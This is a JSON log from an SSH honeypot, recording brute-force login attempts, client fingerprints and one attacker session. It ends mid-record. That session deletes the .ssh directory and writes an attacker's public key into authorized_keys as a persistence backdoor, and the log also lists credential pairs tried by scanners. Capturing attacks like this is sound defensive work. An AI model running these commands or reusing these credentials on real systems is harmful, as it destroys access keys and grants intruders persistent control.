{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T10:43:08.326838Z","src_ip":"139.19.117.131","session":"67384f040e79"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","sensor":"my-vps","timestamp":"2025-08-28T10:43:08.364316Z","src_ip":"139.19.117.131","session":"67384f040e79"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T10:43:08.364955Z","src_ip":"139.19.117.131","session":"67384f040e79"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:43:18.307730Z","src_ip":"139.19.117.131","session":"67384f040e79"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60214,"dst_ip":"1.2.3.4","dst_port":22,"session":"dee356c43abd","protocol":"ssh","message":"New connection: 217.72.205.35:60214 (1.2.3.4:22) [session: dee356c43abd]","sensor":"my-vps","timestamp":"2025-08-28T10:44:18.529629Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:44:18.530708Z","src_ip":"217.72.205.35","session":"dee356c43abd"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":55646,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bf2659731fd","protocol":"ssh","message":"New connection: 27.112.79.123:55646 (1.2.3.4:22) [session: 0bf2659731fd]","sensor":"my-vps","timestamp":"2025-08-28T10:46:32.938046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:46:32.939067Z","src_ip":"27.112.79.123","session":"0bf2659731fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:46:33.209663Z","src_ip":"27.112.79.123","session":"0bf2659731fd"}
{"eventid":"cowrie.login.failed","username":"mosprop","password":"mosprop123","message":"login attempt [mosprop/mosprop123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:46:34.337865Z","src_ip":"27.112.79.123","session":"0bf2659731fd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:46:35.612197Z","src_ip":"27.112.79.123","session":"0bf2659731fd"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.100","src_port":51536,"dst_ip":"1.2.3.4","dst_port":22,"session":"d91cedc1b370","protocol":"ssh","message":"New connection: 203.195.82.100:51536 (1.2.3.4:22) [session: d91cedc1b370]","sensor":"my-vps","timestamp":"2025-08-28T10:47:10.061117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:47:10.061924Z","src_ip":"203.195.82.100","session":"d91cedc1b370"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:47:10.272525Z","src_ip":"203.195.82.100","session":"d91cedc1b370"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:47:18.061607Z","src_ip":"203.195.82.100","session":"d91cedc1b370"}
{"eventid":"cowrie.session.closed","duration":"303.3","message":"Connection lost after 303.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:47:42.552285Z","src_ip":"212.227.235.229","session":"11446fdd0516"}
{"eventid":"cowrie.session.closed","duration":"301.9","message":"Connection lost after 301.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:47:57.477401Z","src_ip":"212.227.235.229","session":"1ba14e194c3f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":47342,"dst_ip":"1.2.3.4","dst_port":22,"session":"da690819102d","protocol":"ssh","message":"New connection: 27.112.79.123:47342 (1.2.3.4:22) [session: da690819102d]","sensor":"my-vps","timestamp":"2025-08-28T10:48:18.869291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:48:18.870219Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:48:19.131962Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.login.success","username":"root","password":"ABC@123456","message":"login attempt [root/ABC@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:48:20.226919Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:48:20.767099Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:48:20.767858Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:48:20.769112Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:21.031638Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:48:21.614906Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:48:21.615649Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:48:21.878762Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:21.879757Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":47346,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce443dc3cd7e","protocol":"ssh","message":"New connection: 27.112.79.123:47346 (1.2.3.4:22) [session: ce443dc3cd7e]","sensor":"my-vps","timestamp":"2025-08-28T10:48:22.150761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:48:22.151483Z","src_ip":"27.112.79.123","session":"ce443dc3cd7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:48:22.422292Z","src_ip":"27.112.79.123","session":"ce443dc3cd7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:48:23.543577Z","src_ip":"27.112.79.123","session":"ce443dc3cd7e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:24.817523Z","src_ip":"27.112.79.123","session":"ce443dc3cd7e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":47362,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd304c14b0e","protocol":"ssh","message":"New connection: 27.112.79.123:47362 (1.2.3.4:22) [session: 6dd304c14b0e]","sensor":"my-vps","timestamp":"2025-08-28T10:48:25.086730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:48:25.087658Z","src_ip":"27.112.79.123","session":"6dd304c14b0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:48:25.358983Z","src_ip":"27.112.79.123","session":"6dd304c14b0e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:48:26.484190Z","src_ip":"27.112.79.123","session":"6dd304c14b0e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:26.755998Z","src_ip":"27.112.79.123","session":"6dd304c14b0e"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:26.756846Z","src_ip":"27.112.79.123","session":"da690819102d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45914,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b007b3eae5","protocol":"ssh","message":"New connection: 212.227.235.229:45914 (1.2.3.4:22) [session: c5b007b3eae5]","sensor":"my-vps","timestamp":"2025-08-28T10:48:40.986831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:48:41.229168Z","src_ip":"212.227.235.229","session":"c5b007b3eae5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:48:41.229964Z","src_ip":"212.227.235.229","session":"c5b007b3eae5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T10:48:42.268316Z","src_ip":"212.227.235.229","session":"c5b007b3eae5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:43.382457Z","src_ip":"212.227.235.229","session":"c5b007b3eae5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23688,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca487987b54","protocol":"ssh","message":"New connection: 212.227.125.160:23688 (1.2.3.4:22) [session: 0ca487987b54]","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.295777Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.297210Z","src_ip":"212.227.125.160","session":"0ca487987b54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23962,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cabbee5684d","protocol":"ssh","message":"New connection: 212.227.125.160:23962 (1.2.3.4:22) [session: 1cabbee5684d]","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.405257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.406173Z","src_ip":"212.227.125.160","session":"1cabbee5684d"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-